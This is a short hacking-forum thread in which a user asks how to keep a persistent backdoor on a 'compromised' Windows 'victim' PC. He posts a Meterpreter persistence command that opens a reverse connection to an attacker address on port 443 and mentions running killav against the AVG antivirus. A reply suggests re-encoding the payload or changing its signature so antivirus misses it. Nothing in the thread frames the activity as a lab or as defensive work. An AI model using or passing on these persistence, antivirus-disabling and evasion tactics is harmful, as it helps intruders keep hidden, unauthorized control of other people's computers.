Forum Thread: Best Approach to Persistent Backdoor?

Hello fellow Null Byters!

I have been trying for a while to set up a persistent backdoor but to no avail. After studying on the topic, I was thinking on 3 different approaches:

  • Meterpreter's Persistence command
  • The Persistence exploit (exploit/windows/local/persistence)
  • Netcap

I tried to use the persistence command in a compromised computer after escalating my privileges. I set the following:

meterpreter> run persistence -A -L c:\\ -X -p443 -r 192.168.1.40

Everything seems to run smoothly but meter won't start the second session it is suppose to. Instead, when I check the victim PC, this is what I found:

I tried killing the AV with killav since I thought that the AV (AVG) could have picked it up. I had the same problem.

So i wondered, had anyone tried the Persistence exploit? I can't seem to figure this one out quite well since it doesn't give you the option to set host of port.

Do you think netcap would be the better solution to have a persistent backdoor? This would basically mean that I would have to install netcap on the victim first though, right?

Cheers and thank you for the feedback!

3 Responses

have you looked at the backdoor code ?
if you can code, then change the signature to trick the av, or encode it

Well, that is assuming that the problem is indeed with the AV detecting the payload. Since its a regular reverse tcp, that's what I am expecting. I will encode the payload generated by the Persistence script and post the results. Thanks anyway!

Share Your Thoughts

  • Hot
  • Active